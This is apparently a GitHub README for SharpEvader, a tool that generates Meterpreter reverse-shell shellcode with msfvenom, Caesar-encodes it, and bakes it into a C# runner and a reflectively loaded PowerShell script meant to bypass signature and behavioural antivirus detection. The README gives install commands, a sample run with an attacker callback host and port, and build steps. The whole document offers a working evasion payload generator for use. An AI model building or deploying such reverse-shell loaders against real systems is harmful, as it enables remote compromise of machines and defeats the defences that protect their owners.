SharpEvader
This is a python script which automatically generates metepreter tcp or https shellcode encodes it and slaps some Behavioural detection in a c# Project for you to build and run
Install / Use
/learn @Xyan1d3/SharpEvaderREADME
🤔 SharpEvader
This is a python script which automatically generates meterpreter tcp/https shellcode and caeser encodes it and slaps some Behavioural detection in a c# Project for you to build and run
✨ Features
- Automatically generate's
windows/x64/meterpreter/reverse_httpsorwindows/x64/meterpreter/reverse_tcpshellcode by borrowingmsfvenom(What more do you expect, Write anmsfvenomclone from scratch ??) from your linux host. - Applies some magic sauce inorder to bypass the Signature Based detection.(The magic sauce is absolutely not Caeser Cipher).
- Generate's a C# Project with the encoded shellcode and some more spells to bypass Behavioural Based Detection.
- Quick, Order your Reverse Shell now Available at an easy installment of $999 each :)
- Powershell Script to generate a reflection ps1 script with the C# executable embedded inside it[Tested as of 28th August 2022].
- Does not use Java !!!
- Owner's or Contributor's of this repo does not take responsibiltes of any damages caused using it or with it, any illegal usage is highly discouraged.
⚙️ Requirements
- Python3.7+
- msfvenom or Metasploit Framework
- mono-mcs C# compiler package
- Powershell on Linux[Optional]
sudo apt update && sudo apt install python3 metasploit-framework mono-mcs powershell
# Metasploit-framework & Powershell are defaultly available on Kali & hopefully parrot(If your distro doesn't have it then its your headache)
🤸 Usage
[Automatic Method]Run SharpEvader.py which would give you compiled exe and ps1 script inside the output folder
~/SharpEvader > python3 sharpevader.py
____ _ _____ _
/ ___|| |__ __ _ _ __ _ __ | ____|_ ____ _ __| | ___ _ __
\___ \| '_ \ / _` | '__| '_ \| _| \ \ / / _` |/ _` |/ _ \ '__|
___) | | | | (_| | | | |_) | |___ \ V / (_| | (_| | __/ |
|____/|_| |_|\__,_|_| | .__/|_____| \_/ \__,_|\__,_|\___|_|
|_|
LHOST: 10.10.14.1
LPORT: 9001
PAYLOAD PROTO(tcp/https): tcp
PAYLOAD TYPE(exe[Default]/dll): exe
[*] Using LHOST as 10.10.14.1, LPORT as 9001 and PAYLOAD as windows/x64/meterpreter/reverse_tcp
[*] Generating msfvenom shellcode...
[+] MSFVenom Shellcode generation successful
[+] Encoded shellcode with caeser cipher with +7 as Key
[*] Deleting the msf_shellcode.hex file as no one wants it anymore
[*] Baking the fresh Shellcode into a C# project for compiling
[+] Your C# shellcode runner is baked successfully, and it smells nice !!!
[+] C# Compiler found, Time for some frosting on the cake ^_^
[+] Your cake has been frosted successfully and named output/10.10.14.1_9001_tcp_exe/rev.exe
[+] Powershell Found, Let\'s Box up your frosted cake...
[+] Boxed it up and named output/10.10.14.1_9001_tcp_exe/rev.ps1
[+] Happy Evasion using 10.10.14.1_9001_tcp_exe!!!
~/SharpEvader/output/10.10.14.1_9001_tcp_exe > ls -l
total 16
drwxr-xr-x 3 root root 4096 Aug 28 00:50 csharp
-rwxr-xr-x 1 root root 5120 Aug 28 00:50 rev.exe
-rw-r--r-- 1 root root 3275 Aug 28 00:50 rev.ps1
[Manual Method]The C# project directory would be placed inside the output directory with name [[LHOST][LPORT][PAYLOADPROTO]_[PAYLOADTYPE]]/csharp/
~/SharpEvader/output/10.10.14.1_9001_tcp/csharp > ls -l
total 24
-rwxr-xr-x 1 root root 189 Aug 9 17:26 App.config
-rwxr-xr-x 1 root root 4135 Aug 9 17:26 Program.cs
drwxr-xr-x 2 root root 4096 Aug 9 17:26 Properties
-rwxr-xr-x 1 root root 3189 Aug 9 17:26 rev.csproj
-rwxr-xr-x 1 root root 892 Aug 9 17:26 rev.sln
To be done on Windows
- Transfer the
[[LHOST]_[LPORT]_[PAYLOADPROTO]_[PAYLOADTYPE]]/csharp/from the output directory and launchrev.slnusingVisual Studio. - Build the Project using the
Releaseandx64build configuration. - Voila !!! The built C# executable would be available in the
[[LHOST]_[LPORT]_[PAYLOADPROTO]_[PAYLOADTYPE]]/csharp/bin/x64/Release/rev.exeorrev.dll
[Optional] Can be done in Windows/Linux with powershell available
- Execute the
reflection_pwsh_gen.ps1supplying the-Fileargument as the absolute path to therev.exeorrev.dll - This would generate a
rev.ps1which would be consist the C#exeordllembedded into a ps1 script which would be reflectively loaded in the memory.
~/SharpEvader > pwsh reflection_pwsh_gen.ps1 -File ~/SharpEvader/output/10.10.14.1_9001_tcp_exe/rev.exe
[+] Written the C# exe Embedded Reflection Reverse Shell into rev.ps1
‼️ Disclaimer
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
